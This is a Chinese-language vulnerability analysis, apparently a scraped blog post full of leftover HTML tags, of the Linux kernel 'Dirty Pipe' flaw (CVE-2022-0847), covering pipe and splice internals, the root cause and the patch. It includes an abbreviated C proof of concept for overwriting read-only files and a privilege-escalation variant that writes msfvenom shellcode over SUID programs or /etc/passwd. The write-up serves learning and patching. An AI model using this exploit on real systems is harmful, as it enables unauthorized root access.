Linux内核漏洞CVE-2022-0847 "Dirty Pipe" 分析与利用指南<\/h1>

漏洞概述<\/h2>

CVE-2022-0847是一个Linux内核漏洞，被称为"Dirty Pipe"，类似于著名的"Dirty Cow"(CVE-2016-5195)漏洞。该漏洞允许攻击者越权对文件进行写入操作，影响范围广泛，CVSS评分为7.2。<\/p>

受影响版本<\/strong>：<\/p>

影响Linux内核5.8及以上版本<\/li>
在5.16.11、5.15.25、5.10.102版本中被修复<\/li> <\/ul>
前置知识<\/h2>
管道(Pipe)机制<\/h3>
管道是Linux中重要的IPC机制，在内核中通过以下结构实现：<\/p>

核心数据结构<\/strong>：

pipe_inode_info<\/code>：管理管道的核心结构<\/li>
pipe_buffer<\/code>：表示管道中单页内存的数据<\/li> <\/ul> <\/li> <\/ol> struct<\/span> pipe_buffer { <\/span><\/span> struct<\/span> page *<\/span>page; \/\/ 存放数据的页框 <\/span><\/span><\/span><\/span> unsigned<\/span> int<\/span> offset, len; \/\/ 数据在页中的偏移和长度 <\/span><\/span><\/span><\/span> const<\/span> struct<\/span> pipe_buf_operations *<\/span>ops; \/\/ 操作函数表 <\/span><\/span><\/span><\/span> unsigned<\/span> int<\/span> flags; \/\/ 缓冲区标志位 <\/span><\/span><\/span><\/span> unsigned<\/span> long<\/span> private; \/\/ 函数表私有数据 <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre> 管道创建流程<\/strong>：<\/p> do_pipe2() → __do_pipe_flags() → create_pipe_files() → get_pipe_inode() → alloc_pipe_info() <\/code><\/pre> <\/li> 管道操作函数表<\/strong>：<\/p> const<\/span> struct<\/span> file_operations pipefifo_fops =<\/span> { <\/span><\/span> .open =<\/span> fifo_open, <\/span><\/span> .llseek =<\/span> no_llseek, <\/span><\/span> .read_iter =<\/span> pipe_read, <\/span><\/span> .write_iter =<\/span> pipe_write, <\/span><\/span> \/\/ ...其他操作 <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 管道写入过程<\/h3> pipe_write()<\/code>函数的关键行为：<\/p> 如果管道非空且上一个buffer未满，尝试向上一个buffer追加数据（需PIPE_BUF_FLAG_CAN_MERGE<\/code>标志）<\/li> 对于新buffer，如果没有PIPE_BUF_FLAG_CAN_MERGE<\/code>标志则分配新页面<\/li> 循环写入直到完成或管道满<\/li> <\/ol> Splice机制<\/h3> splice()<\/code>系统调用用于在文件和管道间高效传输数据，避免了用户空间与内核空间的数据拷贝。<\/p> 关键流程<\/strong>：<\/p> 文件→管道：splice_file_to_pipe() → do_splice_to() → generic_file_splice_read()<\/code><\/li> 管道→文件：do_splice_from() → iter_file_splice_write()<\/code><\/li> <\/ul> 漏洞分析<\/h2> 漏洞原理<\/h3> 漏洞产生于以下条件：<\/p> 管道被完全读写一轮后，所有pipe_buffer<\/code>都保留了PIPE_BUF_FLAG_CAN_MERGE<\/code>标志<\/li> 使用splice<\/code>从文件读取数据到管道时：将pipe_buffer->page<\/code>指向文件映射的页面<\/li> 但未清除pipe_buffer->flags<\/code>中的PIPE_BUF_FLAG_CAN_MERGE<\/code>标志<\/strong><\/li> <\/ul> <\/li> 后续写入时，内核误认为该页面可写入，导致越权写入文件<\/li> <\/ol> 漏洞利用步骤<\/h3> 初始化管道状态<\/strong>：<\/p> 写满然后读空管道，设置所有buffer的PIPE_BUF_FLAG_CAN_MERGE<\/code>标志<\/li> <\/ul> <\/li> 建立文件关联<\/strong>：<\/p> 使用splice<\/code>从目标文件读取1字节到管道<\/li> 使pipe_buffer->page<\/code>指向文件页面，但保留可合并标志<\/li> <\/ul> <\/li> 越权写入<\/strong>：<\/p> 向管道写入数据，内核会将数据写入文件映射的页面<\/li> 完成对只读文件的修改<\/li> <\/ul> <\/li> <\/ol> 漏洞利用实践<\/h2> 基础PoC<\/h3> #define _GNU_SOURCE <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span>#include<\/span> <fcntl.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <string.h><\/span> <\/span><\/span><\/span>#include<\/span> <sys\/stat.h><\/span> <\/span><\/span><\/span>#include<\/span> <sys\/user.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> errExit<\/span>(char<\/span> *<\/span>msg) { <\/span><\/span> printf("<\/span>\033<\/span>[31m<\/span>\033<\/span>[1m[x] Error: <\/span>\033<\/span>[0m%s<\/span>\n<\/span>"<\/span>, msg); <\/span><\/span> exit(EXIT_FAILURE); <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv, char<\/span> **<\/span>envp) { <\/span><\/span> \/\/ 参数检查、文件打开等初始化工作... <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 1. 设置所有pipe_buffer的CAN_MERGE标志 <\/span><\/span><\/span><\/span> pipe(pipe_fd); <\/span><\/span> pipe_size =<\/span> fcntl(pipe_fd[1<\/span>], F_GETPIPE_SZ); <\/span><\/span> buffer =<\/span> malloc(page_size); <\/span><\/span> for<\/span> (int<\/span> size_left =<\/span> pipe_size; size_left ><\/span> 0<\/span>; ) { <\/span><\/span> int<\/span> per_write =<\/span> size_left ><\/span> page_size ?<\/span> page_size : size_left; <\/span><\/span> size_left -=<\/span> write(pipe_fd[1<\/span>], buffer, per_write); <\/span><\/span> } <\/span><\/span> for<\/span> (int<\/span> size_left =<\/span> pipe_size; size_left ><\/span> 0<\/span>; ) { <\/span><\/span> int<\/span> per_read =<\/span> size_left ><\/span> page_size ?<\/span> page_size : size_left; <\/span><\/span> size_left -=<\/span> read(pipe_fd[0<\/span>], buffer, per_read); <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 2. 使用splice建立文件关联 <\/span><\/span><\/span><\/span> offset_in_file--<\/span>; <\/span><\/span> retval =<\/span> splice(target_file_fd, &<\/span>offset_in_file, pipe_fd[1<\/span>], NULL, 1<\/span>, 0<\/span>); <\/span><\/span> if<\/span> (retval <<\/span> 0<\/span>) errExit("splice failed!"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 3. 越权写入文件 <\/span><\/span><\/span><\/span> retval =<\/span> write(pipe_fd[1<\/span>], argv[3<\/span>], data_size); <\/span><\/span> if<\/span> (retval <<\/span> 0<\/span>) errExit("Write failed!"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>提权利用<\/h3> 通过覆写SUID程序或\/etc\/passwd文件实现提权：<\/p> unsigned<\/span> char<\/span> shellcode[] =<\/span> { <\/span><\/span> \/\/ msfvenom生成的shellcode <\/span><\/span><\/span><\/span> 0x7f<\/span>, 0x45<\/span>, 0x4c<\/span>, 0x46<\/span>, 0x02<\/span>, 0x01<\/span>, 0x01<\/span>, 0x00<\/span>, <\/span><\/span> \/\/ ...省略其他字节 <\/span><\/span><\/span><\/span>}; <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) { <\/span><\/span> \/\/ ...同上初始化步骤 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 写入shellcode <\/span><\/span><\/span><\/span> retval =<\/span> write(pipe_fd[1<\/span>], &<\/span>shellcode[1<\/span>], shellcode_len); <\/span><\/span> <\/span><\/span> \/\/ 触发提权 <\/span><\/span><\/span><\/span> system(argv[1<\/span>]); <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞修复<\/h2> 修复方案是在相关操作中清除pipe_buffer->flags<\/code>：<\/p> --- a\/lib\/iov_iter.c <\/span><\/span><\/span><\/span>+++ b\/lib\/iov_iter.c <\/span><\/span><\/span><\/span>@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by <\/span><\/span><\/span><\/span> return 0; <\/span><\/span> buf->ops = &page_cache_pipe_buf_ops; <\/span><\/span>+buf->flags = 0; <\/span><\/span><\/span><\/span> get_page(page); <\/span><\/span> buf->page = page; <\/span><\/span> buf->offset = offset; <\/span><\/span>@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size, <\/span><\/span><\/span><\/span> break; <\/span><\/span> buf->ops = &default_pipe_buf_ops; <\/span><\/span>+buf->flags = 0; <\/span><\/span><\/span><\/span> buf->page = page; <\/span><\/span> buf->offset = 0; <\/span><\/span> buf->len = min_t(ssize_t, left, PAGE_SIZE); <\/span><\/span><\/code><\/pre>总结<\/h2> "Dirty Pipe"漏洞利用管道机制中的标志位处理不当，实现了对只读文件的越权写入。与"Dirty Cow"相比，该漏洞利用更稳定但写入范围受限。系统管理员应及时更新内核，开发者应注意内核数据结构的状态一致性。<\/p>